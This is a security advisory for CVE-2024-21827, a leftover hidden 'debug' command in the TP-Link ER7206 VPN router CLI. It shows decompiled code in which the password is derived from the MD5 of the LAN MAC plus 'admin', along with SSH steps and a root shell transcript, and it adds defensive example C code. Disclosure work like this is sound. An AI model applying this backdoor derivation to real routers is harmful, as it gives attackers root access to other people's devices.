CVE-2024-21827
A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.
The ER7206 router has a “Remote Assistance” functionality; when it is enabled, it is possible to SSH into the router using the same admin credentials as the web portal.
After the SSH login, the user is presented with a router CLI shell:
>help
Commands available:
help Show available commands
exit Exit from current mode
enable Turn on privileged commands
disable Turn off privileged commands
The help command prints the available commands that the user can execute, which are limited in functionality. There is a hidden command called debug. The following is the cli_server’s cli_debug_command function, which is responsible for handling that command:
undefined8 cli_debug_command(undefined8 terminal_related)
{
    [...]
[1] ret = uac_com_get_dev_mac(&LAN_MAC);
    [...]
    error = 0;
[2] snprintf((char *)&mac_plus_admin,0x17,"%02X:%02X:%02X:%02X:%02X:%02Xadmin",
             (ulonglong)LAN_MAC._0_1_,(ulonglong)LAN_MAC._1_1_,(ulonglong)LAN_MAC._2_1_,
             (ulonglong)(byte)LAN_MAC,(ulonglong)local_44._0_1_,(ulonglong)(byte)local_44);
    mac_plus_admin_len = strlen((char *)&mac_plus_admin);
[3] md5_hexdigest(&mac_plus_admin,mac_plus_admin_len,mac_plus_admin_hex_digest,0x20);
    cli_print_no_enter(terminal_related,"Enter your password: ");
    [...]
    idx = 0;
    [...]
    while( true ) {
        [...]
        read_size = read(terminal,terminal_input_one_char,1);
        if (read_size < 0) break;
        input_char = (ulonglong)terminal_input_one_char[0];
        if (read_size == 0) goto check_password;
        if (((-1 < input_char) [...]) && input_char != 0)) {
            if (input_char == '\r') goto check_password;
            if (idx < 0x10) {
                terminal_input[idx] = terminal_input_one_char[0];
                idx = (longlong)((int)idx + 1);
            }
            else {
                error = -1;
            }
        }
    }
    [...]
check_password:
    if (error != -1) {
        if (error != 0) {
            return 0;
        }
[4]     is_eq = strncmp(mac_plus_admin_hex_digest,terminal_input,0x10);
        if (is_eq == 0) {
[5]         system_shell_wrap();
            return 0;
        }
    }
    [...]
}
This functionality asks for a password; if the password is correct, the user is granted a full Linux shell.
At [1], the LAN MAC address of the device is fetched; this is then used, at [2], to compose the <LAN_MAC>admin string. At [3], the MD5 of the composed string is calculated; then, at [4], the first 16 bytes of the MD5 hex digest are compared with the provided password, and if the two are equal the code at [5] is reached. At [5], the system_shell_wrap function is called, which grants the user a full Linux shell.
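As an added illustration of how CWE-489 is avoided at the design level (this is example code written for this page, not TP-Link's firmware or the cli_server binary), the dispatcher below keeps a single command table that feeds both the help listing and command lookup, so no handler can be reachable without being listed, and it compiles a debug handler only when a hypothetical CLI_ENABLE_DEBUG build flag is set, refusing that flag in combination with a hypothetical CLI_RELEASE_BUILD flag. The command names and descriptions are taken from the help output shown above; the enable/disable handlers only toggle a privilege flag, since their real behaviour is not what the example is about.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Example code (not TP-Link's): a CLI whose command table is the single
 * source of truth for dispatch and for `help`, so there is no way to add a
 * handler that the user cannot see. CLI_ENABLE_DEBUG and CLI_RELEASE_BUILD
 * are hypothetical build flags chosen for this illustration. */

#if defined(CLI_RELEASE_BUILD) && defined(CLI_ENABLE_DEBUG)
#error "debug CLI commands must not be compiled into a release build"
#endif

typedef int (*cli_handler_t)(const char *args);

typedef struct {
    const char *name;
    const char *help;      /* an empty or NULL entry would be a hidden command */
    cli_handler_t handler;
} cli_command_t;

static int cli_privileged = 0;

static int cmd_help(const char *args);
static int cmd_exit(const char *args)    { (void)args; return 0; }
static int cmd_enable(const char *args)  { (void)args; cli_privileged = 1; return 0; }
static int cmd_disable(const char *args) { (void)args; cli_privileged = 0; return 0; }
#ifdef CLI_ENABLE_DEBUG
/* Only exists in debug builds; never part of a release image. */
static int cmd_debug(const char *args)   { (void)args; return 0; }
#endif

/* Every command the CLI accepts is in this table, and `help` prints it. */
static const cli_command_t cli_commands[] = {
    { "help",    "Show available commands",      cmd_help },
    { "exit",    "Exit from current mode",       cmd_exit },
    { "enable",  "Turn on privileged commands",  cmd_enable },
    { "disable", "Turn off privileged commands", cmd_disable },
#ifdef CLI_ENABLE_DEBUG
    { "debug",   "Drop to a system shell (debug builds only)", cmd_debug },
#endif
};
#define CLI_COMMAND_COUNT (sizeof cli_commands / sizeof cli_commands[0])

int cli_is_privileged(void) { return cli_privileged; }

/* Exact-name lookup; unknown names return NULL instead of a hidden handler. */
const cli_command_t *cli_lookup(const char *name) {
    for (size_t i = 0; i < CLI_COMMAND_COUNT; i++)
        if (strcmp(cli_commands[i].name, name) == 0)
            return &cli_commands[i];
    return NULL;
}

/* Audit helper: number of registered handlers that `help` would not show.
 * By construction this is zero; a build-time or unit-test check keeps it so. */
size_t cli_count_undocumented(void) {
    size_t n = 0;
    for (size_t i = 0; i < CLI_COMMAND_COUNT; i++)
        if (cli_commands[i].help == NULL || cli_commands[i].help[0] == '\0')
            n++;
    return n;
}

static int cmd_help(const char *args) {
    (void)args;
    puts("Commands available:");
    for (size_t i = 0; i < CLI_COMMAND_COUNT; i++)
        printf("%-8s %s\n", cli_commands[i].name, cli_commands[i].help);
    return 0;
}

/* Dispatch one input line: the first word is the command, the rest is its
 * argument string. Returns the handler's result, or -1 for an unknown command. */
int cli_dispatch(const char *line) {
    char name[32];
    const char *sp = strchr(line, ' ');
    size_t len = sp ? (size_t)(sp - line) : strlen(line);
    if (len == 0 || len >= sizeof name) return -1;
    memcpy(name, line, len);
    name[len] = '\0';
    const cli_command_t *cmd = cli_lookup(name);
    if (cmd == NULL) return -1;
    return cmd->handler(sp ? sp + 1 : "");
}

int main(void) {
    cli_dispatch("help");
    printf("undocumented handlers: %zu\n", cli_count_undocumented());
    printf("debug accepted: %s\n", cli_dispatch("debug") == 0 ? "yes" : "no");
    return 0;
}
```

In a release build of this example, "debug" is not merely undocumented but absent from the binary, so there is no password prompt to reach and nothing for a firmware reviewer to find. If a debug path must exist in a debug build, its gate should also not be a secret derived deterministically from an identifier that every LAN host can observe, as the MAC-based digest above is.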
The first step is to enable “Remote Assistance” in the web portal; after that it is possible to SSH into the router:
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=diffie-hellman-group14-sha1 POC@192.168.0.1
POC@192.168.0.1's password:
>help
Commands available:
help Show available commands
exit Exit from current mode
enable Turn on privileged commands
disable Turn off privileged commands
The CLI console offers a limited number of commands; if the hidden command debug is entered, the CLI asks for a password:
>debug
Enter your password:
BusyBox v1.22.1 (2024-01-16 18:32:23 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
BARRIER BREAKER (Barrier Breaker, unknown)
-----------------------------------------------------
* 1/2 oz Galliano Pour all ingredients into
* 4 oz cold Coffee an irish coffee mug filled
* 1 1/2 oz Dark Rum with crushed ice. Stir.
* 2 tsp. Creme de Cacao
-----------------------------------------------------
root@ER7206:/#
If the password is correct, the user obtains a full Linux shell.
The vendor provided a fix at: https://www.tp-link.com/en/support/download/er7206/v1/#Firmware
2024-02-21 - Vendor Disclosure
2024-06-20 - Vendor Patch Release
2024-06-25 - Public Release
Discovered by the Vulnerability Discovery and Research team of Cisco Talos.